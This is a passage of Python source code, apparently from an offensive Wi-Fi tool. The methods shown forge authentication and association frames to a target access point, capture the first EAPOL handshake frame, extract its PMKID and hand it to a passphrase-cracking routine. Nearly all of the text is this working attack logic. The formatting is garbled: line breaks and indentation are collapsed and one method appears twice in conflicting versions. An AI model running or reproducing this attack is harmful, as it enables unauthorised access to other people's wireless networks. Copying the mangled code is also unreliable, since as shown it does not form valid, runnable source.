def asso_conn(self): if not self.__ASSO_STATUS: asso_catcher = threading.Thread(target=self.asso_sniffer, args=(self.iface,), name="Association Depender") asso_catcher.daemon = True asso_catcher.start() _retry = 0 while not self.__ASSO_STEP: self._randn_(4) if self.verbose: self.pull.up("%i Frames %s (%s) %s>%s %s (%s) %s[Association Request]%s" % \ (self._randn, self.cl.replace(':', '').upper(), self.pull.DARKCYAN+org(self.cl).org+self.pull.END, self.pull.RED, self.pull.END,\ self.ap.replace(':', '').upper(), self.pull.DARKCYAN+org(self.ap).org+self.pull.END, self.pull.BLUE, self.pull.END)) else: self.pull.up("%i Frames %s %s>%s %s %s[Association Request]%s" % (self._randn, self.cl.replace(':', '').upper(), self.pull.RED, self.pull.END,\ self.ap.replace(':', '').upper(), self.pull.BLUE, self.pull.END)) sendp(self.asso, iface=self.iface, count=1, verbose=False) time.sleep(2); _retry += 1 if _retry >= self.retry_limit: self.pull.right("Maximum Limit Reached for Association Requests.") self.pull.info("Sleeping! Would restart the process in 30 seconds. ") time.sleep(30) break return self.__ASSO_STEP
def _randn_(self, _max): if self._nframes == 0: self._randn = org().randomness(_max, self._randn) else: self._randn = self._nframes return
def get_asso_resp(self, pkt): if pkt.haslayer(Dot11AssoResp): if pkt.getlayer(Dot11AssoResp).status == 0: sn = pkt.getlayer(Dot11).addr2.replace(':', '') rc = pkt.getlayer(Dot11).addr1.replace(':', '') if rc == self.cl.replace(':', '') and sn == self.ap.replace(':', ''): self.pull.info("1 Frames %s > %s %s[Association Response]%s" % (self.ap.replace(':', '').upper(),\ self.cl.replace(':', '').upper(), self.pull.YELLOW, self.pull.END)) if self.verbose: self.pull.info("Association with Access Point %s[SuccessFull]%s" % (self.pull.GREEN, self.pull.END) ) self.pull.info("Waiting For EAPOL to initate...") if pkt.haslayer(EAPOL): sn = pkt.getlayer(Dot11).addr2.replace(':', '') nonce = binascii.hexlify(pkt.getlayer(Raw).load)[26:90] mic = binascii.hexlify(pkt.getlayer(Raw).load)[154:186] fNONCE = "0000000000000000000000000000000000000000000000000000000000000000" fMIC = "00000000000000000000000000000000" if sn == self.ap.replace(':', '') and nonce != fNONCE and mic == fMIC: self.__ASSO_STEP = True self.pull.up("EAPOL %s > %s %s[1 of 4]%s" % (self.ap.replace(':', '').upper(), self.cl.replace(':', '').upper(),\ self.pull.BOLD+self.pull.GREEN, self.pull.END) ) if self.verbose: self.pull.info("Successfull handshake initiated [%s]" % org(self.ap).org) self.__EAPOL = pkt raise ValueError
def dev_conn(self): auth_catcher = threading.Thread(target=self.auth_sniffer, args=(self.iface,), name="Authentication Catcher") auth_catcher.daemon = True auth_catcher.start() while not self.__AUTH_STEP: self._randn_(3) if self.verbose: self.pull.up("%i Frames %s (%s) %s>%s %s (%s) %s[Open Authentication]%s" % \ (self._randn, self.cl.replace(':', '').upper(), self.pull.DARKCYAN+org(self.cl).org+self.pull.END, self.pull.RED, self.pull.END,\ self.ap.replace(':', '').upper(), self.pull.DARKCYAN+org(self.ap).org+self.pull.END, self.pull.BLUE, self.pull.END)) else: self.pull.up("%i Frames %s %s>%s %s %s[Open Authentication]%s" % (self._randn, self.cl.replace(':', '').upper(), self.pull.RED, self.pull.END,\ self.ap.replace(':', '').upper(), self.pull.BLUE, self.pull.END)) sendp(self.auth, iface=self.iface, count=2, verbose=False) if not self.__AUTH_STATUS: break time.sleep(1) return self.__AUTH_STEP
def get_auth_resp(self, pkt): if pkt.haslayer(RadioTap): if pkt.haslayer(Dot11Auth): sn = pkt.getlayer(Dot11).addr2.replace(':', '') rc = pkt.getlayer(Dot11).addr1.replace(':', '') if rc == self.cl.replace(':', '') and sn == self.ap.replace(':', ''): if self.verbose: self.pull.info("Received %s (%s) %s<%s %s (%s) %s[Open Authentication]%s" % \ (self.cl.replace(':', '').upper(), self.pull.DARKCYAN+org(self.cl).org+self.pull.END, self.pull.RED, self.pull.END, self.ap.replace(':', '').upper(),\ self.pull.DARKCYAN+org(self.ap).org+self.pull.END, self.pull.YELLOW, self.pull.END)) self.pull.info("Authentication %s (%s) %s>%s %s (%s) %s[SuccessFull]%s" % \ (self.ap.replace(':', '').upper(), self.pull.DARKCYAN+org(self.ap).org+self.pull.END, self.pull.RED, self.pull.END, self.cl.replace(':', '').upper(),\ self.pull.DARKCYAN+org(self.cl).org+self.pull.END, self.pull.GREEN, self.pull.END)) else: self.pull.info("Received %s %s<%s %s %s[Open Authentication]%s" % (self.cl.replace(':', '').upper(), self.pull.RED, self.pull.END,\ self.ap.replace(':', '').upper(), self.pull.YELLOW, self.pull.END)) self.pull.info("Authentication %s %s>%s %s %s[SuccessFull]%s" % \ (self.ap.replace(':', '').upper(), self.pull.RED, self.pull.END, self.cl.replace(':', '').upper(),\ self.pull.GREEN, self.pull.END)) self.__AUTH_STEP = bool(1) raise ValueError
def get_asso_resp(self, pkt): if pkt.haslayer(Dot11AssoResp): if pkt.getlayer(Dot11AssoResp).status == 0: sn = pkt.getlayer(Dot11).addr2.replace(':', '') rc = pkt.getlayer(Dot11).addr1.replace(':', '') if rc == self.cl.replace(':', '') and sn == self.ap.replace( ':', ''): if self.verbose: self.pull.info("Received %s (%s) %s<%s %s (%s) %s[Association Response]%s" % \ (self.cl.replace(':', '').upper(), self.pull.DARKCYAN+org(self.cl).org+self.pull.END, self.pull.RED, self.pull.END, self.ap.replace(':', '').upper(),\ self.pull.DARKCYAN+org(self.ap).org+self.pull.END, self.pull.YELLOW, self.pull.END)) else: self.pull.info("Received %s %s<%s %s %s[Association Response]%s" % (self.cl.replace(':', '').upper(), self.pull.RED, self.pull.END,\ self.ap.replace(':', '').upper(), self.pull.YELLOW, self.pull.END)) if not self.__M_PLACED: if self.verbose: self.pull.info("Authentication %s (%s) %s>%s %s (%s) %s[SuccessFull]%s" % \ (self.ap.replace(':', '').upper(), self.pull.DARKCYAN+org(self.ap).org+self.pull.END, self.pull.RED, self.pull.END, self.cl.replace(':', '').upper(),\ self.pull.DARKCYAN+org(self.cl).org+self.pull.END, self.pull.GREEN, self.pull.END)) self.pull.info("EAPOL %s (%s) %s>%s %s (%s) %s[Waiting...]%s" % \ (self.ap.replace(':', '').upper(), self.pull.DARKCYAN+org(self.ap).org+self.pull.END, self.pull.RED, self.pull.END, self.cl.replace(':', '').upper(),\ self.pull.DARKCYAN+org(self.cl).org+self.pull.END, self.pull.PURPLE, self.pull.END)) else: self.pull.info("Authentication %s %s>%s %s %s[SuccessFull]%s" % \ (self.ap.replace(':', '').upper(), self.pull.RED, self.pull.END, self.cl.replace(':', '').upper(),\ self.pull.GREEN, self.pull.END)) self.pull.info("EAPOL %s %s>%s %s %s[Waiting...]%s" % \ (self.ap.replace(':', '').upper(), self.pull.RED, self.pull.END, self.cl.replace(':', '').upper(),\ self.pull.PURPLE, self.pull.END)) self.__M_PLACED = bool(1) if pkt.haslayer(EAPOL): sn = pkt.getlayer(Dot11).addr2.replace(':', '') nonce = binascii.hexlify(pkt.getlayer(Raw).load)[26:90] mic = binascii.hexlify(pkt.getlayer(Raw).load)[154:186] fNONCE = "0000000000000000000000000000000000000000000000000000000000000000" fMIC = "00000000000000000000000000000000" if sn == self.ap.replace(':', '') and nonce != fNONCE and mic == fMIC: self.__ASSO_STEP = True if self.verbose: self.pull.info("EAPOL %s (%s) %s>%s %s (%s) %s[Initiated]%s" % (self.ap.replace(':', '').upper(), self.pull.DARKCYAN+org(self.ap).org+self.pull.END , self.pull.RED, self.pull.END,\ self.cl.replace(':', '').upper(), \ self.pull.DARKCYAN+org(self.cl).org+self.pull.END, self.pull.YELLOW, self.pull.END)) self.pull.up("EAPOL %s (%s) %s>%s %s (%s) %s[1 of 4]%s" % (self.ap.replace(':', '').upper(), self.pull.DARKCYAN+org(self.ap).org+self.pull.END,\ self.pull.RED, self.pull.END, self.cl.replace(':', '').upper(),\ self.pull.DARKCYAN+org(self.cl).org+self.pull.END, self.pull.GREEN, self.pull.END) ) else: self.pull.info("EAPOL %s %s>%s %s %s[Initiated]%s" % (self.ap.replace(':', '').upper(), self.pull.RED, self.pull.END, self.cl.replace(':', '').upper(), \ self.pull.YELLOW, self.pull.END)) self.pull.up("EAPOL %s %s>%s %s %s[1 of 4]%s" % (self.ap.replace(':', '').upper(), self.pull.RED, self.pull.END, self.cl.replace(':', '').upper(),\ self.pull.BOLD+self.pull.GREEN, self.pull.END) ) self.__EAPOL = pkt raise ValueError("EAPOL")
def crack(self, _write): fPMKID = '00000000000000000000000000000000' PMKID = binascii.hexlify(self.__EAPOL.getlayer(Raw).load)[202:234] if PMKID != fPMKID and PMKID != '': self.pull.special("Vulnerable to PMKID Attack!") if self.verbose: self.pull.up( "PMKID %s (%s) [%s]" % (self.ap.replace(':', '').upper(), self.pull.DARKCYAN + org(self.ap).org + self.pull.END, self.pull.RED + PMKID + self.pull.END)) else: self.pull.up("PMKID %s [%s]" % (self.ap.replace( ':', '').upper(), self.pull.RED + PMKID + self.pull.END)) self.save(_write, PMKID) _pmk = self.crack_the_pmk(PMKID) return _pmk else: self.pull.error( "The target AP doesn't contain PMKID field. Not Vulnerable. Try with handshake. " ) sys.exit(0)